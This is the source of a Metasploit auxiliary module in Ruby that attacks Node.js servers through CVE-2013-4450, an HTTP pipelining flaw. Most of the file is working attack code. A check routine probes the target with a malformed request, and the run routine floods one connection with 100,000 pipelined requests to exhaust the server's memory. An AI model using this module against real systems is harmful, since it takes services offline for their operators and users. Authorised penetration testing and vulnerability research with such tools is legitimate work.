metasploit-framework/modules/auxiliary/dos/http/nodejs_pipelining.rb

89 lines
2.9 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Node.js HTTP Pipelining Denial of Service',
'Description' => %q{
This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions
released before 0.10.21 and 0.8.26. The attack sends many pipelined
HTTP requests on a single connection, which causes unbounded memory
allocation when the client does not read the responses.
},
'Author' =>
[
'Marek Majkowski', # Vulnerability discovery
'titanous', # Metasploit module
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-4450' ],
[ 'OSVDB', '98724' ],
[ 'BID' , '63229' ],
[ 'URL', 'http://blog.nodejs.org/2013/10/22/cve-2013-4450-http-server-pipeline-flood-dos' ]
],
'DisclosureDate' => 'Oct 18 2013'))
register_options(
[
Opt::RPORT(80),
OptInt.new('RLIMIT', [true, "Number of requests to send", 100000])
],
self.class)
end
def check
# http://blog.nodejs.org/2013/08/21/node-v0-10-17-stable/
# check if we are < 0.10.17 by seeing if a malformed HTTP request is accepted
status = Exploit::CheckCode::Safe
connect
sock.put(http_request("GEM"))
begin
response = sock.get_once
status = Exploit::CheckCode::Appears if response =~ /HTTP/
rescue EOFError
# checking against >= 0.10.17 raises EOFError because there is no
# response to GEM requests
vprint_error("Failed to determine the vulnerable state due to an EOFError (no response)")
return Msf::Exploit::CheckCode::Unknown
ensure
disconnect
end
status
end
def host
host = datastore['RHOST']
host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
host
end
def http_request(method='GET')
"#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"
end
def run
payload = http_request
begin
print_status("Stressing the target memory...")
connect
datastore['RLIMIT'].times { sock.put(payload) }
print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Unable to connect to #{host}.")
rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
ensure
disconnect
end
end
end